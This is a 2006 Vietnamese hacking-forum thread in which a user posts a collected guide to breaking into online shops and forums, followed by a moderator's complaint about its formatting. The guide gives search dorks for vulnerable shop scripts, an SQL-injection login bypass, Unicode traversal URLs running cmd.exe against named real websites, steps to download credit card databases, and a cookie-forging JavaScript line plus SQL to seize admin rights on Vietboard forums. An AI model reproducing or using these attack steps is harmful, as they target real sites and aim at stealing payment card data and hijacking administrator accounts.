banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận thâm nhập Hack toàn tập - Sưu tầm  XML
  [Question]   Hack toàn tập - Sưu tầm 13/07/2006 20:07:22 (+0700) | #1 | 6340
BigballVN
Elite Member

[Minus]    0    [Plus]
Joined: 12/06/2005 07:25:21
Messages: 610
Offline
[Profile] [PM]
Đầu tiên mong các mod thấy nếu bài này phạm quy xin del chứ đừng Ban em. Tội nghiệp. Em sưu tầm cho mấy mem đọc ah. Có thể nó không còn dùng được nhưng có thể làm tư liệu tham khảo
===
I-Lỗi Tek9.asp :

Cách thức tìm : Dùng Google

Câu tìm kiếm : tek9.asp

Kết quả : Bạn tìm các trang web hiện lên , ví dụ là http://198.170.250.68/ tek9_login.asp

Bạn sẽ thêm intranet trước tek9.asp

http://198.170.250.68/intranet/tek9_login.asp


Được gì ? Bạn vào trang đăng nhập của người quản trị.

Tên và mật khẩu : Đều là 'or''='

Sau đó ? Bạn tự tìm hiểu vì mỗi trang có 1 sự trình bày hơi khác nhau. Trang trên cho phép bạn quản lý thông số , kiểu , cách thức và vài chỗ có liên quan đến cơ sở dữ liệu chứa thẻ tín dụng. Ngòai ra bạn có thể tìm lệnh Find orders để truy tìm khu vực chức thẻ.



============================



II-Lỗi Cart32 v3.5a

Cách thức tìm : Dùng Google

Câu tìm kiếm : Cart32 v3.5a

Kết quả : Chạy các trang web có tập tin cart32.exe . Bạn sẽ nhận được 1 số thông tin

Được gì ? Chưa được gì hết

Tên và mật khẩu : Không cần

Sau đó ? Giả sử bạn kiếm được trang web sau có lỗi

http://www.connectionsmall.com/scripts/cart32.exe/

Bạn thay từ card32.exe bằng những dòng sau đây :

Code:
I)

..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\

II)

..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

III)

..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\


Ví dụ :

Code:
http://www.connectionsmall.com/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\


-Nếu không chuyện gì xảy ra thì bạn thêm dòng địa chỉ sau vào cuối cùng để lấy thẻ tín dụng :

\progra~1\MWAInc\Cart32\

-Bạn sẽ thấy những dòng giống như sau :

2814659000-001001.c32

2814659000-001002.c32

2814659000-001003.c32 


-Bây giờ tất những gì cần phải làm là bạn thêm 1 trong ba hoặc thử thì dùng từng cái vào cuối địa chỉ trên. Sau cùng ta sẽ có giống như thế này :

Code:
http://www.connectionsmall.com/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\progra~1\MWAInc\Cart32\2814659000-001001.c32




============================



III-Lỗi Commerce.cgi

Cách thức tìm : Dùng Google

Câu tìm kiếm : Commerce.cgi

Kết quả : Chạy các trang web có tập tin Commerce.cgi. Giả sử bạn kiếm được trang web sau có lỗi

Code:
http://www.warresisters.org/store/commerce.cgi


Bạn thay từ commerce.cgi bằng admin_files/commerce_user_lib.pl

Ví dụ :

Code:
http://www.warresisters.org/store/admin_files/commerce_user_lib.pl


Bạn sẽ nhận được 1 số thông tin :

$sc_sales_tax = ".0825";

$sc_sales_tax_state = "NY";

$sc_send_order_to_email = "yes";

$sc_order_log_name = "onlinebookstore.log";

$sc_send_order_to_log = "yes";

$shipping_percentage = ".15";

$sc_order_email = "wrl\@igc.org";

$sc_root_url = "http://www.warresisters.org/store";

$sc_admin_email = "lit\@warresisters.org";

$sc_domain_name_for_cookie = ".warresisters.org";

$sc_order_script_url = "https://secure.serve.com/resist/store/commerce.cgi";

$sc_root_web_path = "/home/serve/resist/Html/Products";

$sc_path_for_cookie = "/store";

$path_to_html = "../Html";

1; 


Được gì ? 1 số thông tin quan trọng về cơ sở dữ liệu

Tên và mật khẩu : Không cần

Sau đó

Xóa cái commerce_user_lib.pl đi thay bằng dòng chữ tìm ở $sc_order_log_name và ....



============================



III-Lỗi shopdisplaycategories

Cách thức tìm : Dùng Google

Câu tìm kiếm : shopdisplaycategories

Kết quả : Trong link các trang bị lỗi , bạn thay shopdisplaycategories.asp thành shopdbtest.asp

Được gì ? Bạn biết được đường dẫn để tải cơ sở dữ liệu Thẻ Tín Dụng

Tên và mật khẩu : Không cần

Sau đó : Thay shopdbtest.asp bằng phần trả lời của xdatabase ( bạn tìm ở phía trên )



============================



IV-Lỗi SQL Injection


Cách thức tìm : Dùng Google

Câu tìm kiếm : admentor

Kết quả : Bạn vào trang bị lỗi , đăng nhập với Username và Password là 'or''='

Được gì ? Bây giờ bạn nắm mọi họat động quản lý của website trong vai Admin

Tên và mật khẩu : 'or''='

Sau đó : Bạn tự tìm hiểu



============================



IV-Lỗi datasources

Cách thức tìm : Dùng Google

Câu tìm kiếm : datasources/ hay config/datasources/

Kết quả :Đường dẫn những trang bị lỗi này

Được gì ? Từ đây bạn thêm vào expire.mdb vào sau datasources/ hay config/datasources/

Tên và mật khẩu : Không cần

Sau đó : Bạn tải được kho dữ liệu có credit card
[Up] [Print Copy]
  [Question]   Hack toàn tập - Sưu tầm 13/07/2006 20:08:18 (+0700) | #2 | 6341
BigballVN
Elite Member

[Minus]    0    [Plus]
Joined: 12/06/2005 07:25:21
Messages: 610
Offline
[Profile] [PM]
Hacker Forum Vietboard 2.5 , 2.6



Chiếm quyền Admin các forum Vieboard bằng JavaScript Inline

Trước tết tôi có vào các forum này để test thử lỗi JavaScript Inline thì bị "dính" rât nhiều nhưng chưa bị hack, nhưng cho tới bây giờ thì hầu hết đã bị hack. Các phiên bản Vieboard 2.5, 2.6 đều có thể dễ dàng chiếm quyền Admin bằng JavaScript Inline.



Hãy thử gõ đoạn JavaScript dưới vào trình duyệt rồi enter, sau đó refresh lại trình duyệt để thấy link đến Control panel của Admin hoặc truy cập thẳng vào Control panel của Admin (www.victim.com/forum/adm_fr.asp):

javascript:void(document.cookie="isLogged=mod=False&mSN=Admin&group=1&mid=1")



Nếu để mSN=Admin thì coi như bạn đã login vào bằng user Admin, nếu mSN= tên đăng ký của bạn thì giống như bạn login vào bằng account của mình nhưng với quyền Admin.



Bạn để ý group=1 trong đoạn JavaScript trên, con số 1 chính là con số cho biết user này là Admin, còn các member là 2.



Sau khi đã vào được Control panel của Admin thì có thể set cho account của bạn có quyền Admin bằng cách gõ câu lệnh SQL dưới vào textbox "SQL Query (For Advanced User Only)" ở phía bên dưới rồi Click vào "Query":



Update tblMember Set mGroup = 1 Where mSN = 'tendangkycuaban'



Lưu ý: tên đăng ký của bạn trong câu lệnh SQL được bao bởi cặp dấu nháy đơn.



Nếu không thành công, có thể do admin của forum đã đổi tên file Control panel hoặc đổi tên Cookies, hãy gõ đoạn JavaScript sau vào trình duyệt rồi enter để biết tên Cookie:



javascript:alert(document.cookie)

Tác giả : TurboBH
[Up] [Print Copy]
  [Question]   Re: Hack toàn tập - Sưu tầm 13/07/2006 21:55:27 (+0700) | #3 | 6362
[Avatar]
NguyenTracHuy
HVA Friend

Joined: 08/08/2003 15:34:40
Messages: 388
Offline
[Profile] [PM]
Lưu ý với bạn Bigball_hacker một điều là: Tất cả các bài viết dù là của bạn hay bạn sưu tầm , bạn nên có trách nhiệm với bài mình đã gởi, bạn nên format lại cho rõ ràng, dùng font chữ màu đối với các tiểu mục, các lệnh hoặc code thì nên làm rõ. Tất cả những điều đó sẽ giúp người đọc dễ dàng tiếp thu hơn khi đọc bài và không có cảm giác ngao ngán. Nếu bạn không có thời gian bạn nên gởi một bài cho một ngày, bạn không nên cứ copy và paste vô tội vạ mà không biết mình đang làm gì. Bạn cứ copy và paste một bài viết dài ngoằng mà không có một điểm nhấn nào trong một bài viết, mã nguồn và câu lệnh chen lẫn với câu văn thì mình nghĩ rằng sẽ không có nhiều người đủ kiên nhẫn đọc hết bài của bạn, vì nếu là một chủ đề mới, một kiếnm thức mới đồi với họ thì sẽ khó lòng phân biệt được đâu là đâu (đâu là lệnh, đâu là code còn đâu là câu văn
Chữ ký bạn có dòng sau "1. Trở thành 1 poster có ý nghĩa", thì tôi thấy bạn đã xa dần với điều này, mặc dù số lượng bài viết của bạn rất rất nhiều, nhưng đa số lại là chat chit, đâu đâu cũng có bạn. Nếu như vậy thì bạn đang dần dần trở thành "người tạo rác cho diễn đàn "

Vài lời góp ý .

Tks & Regards


[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|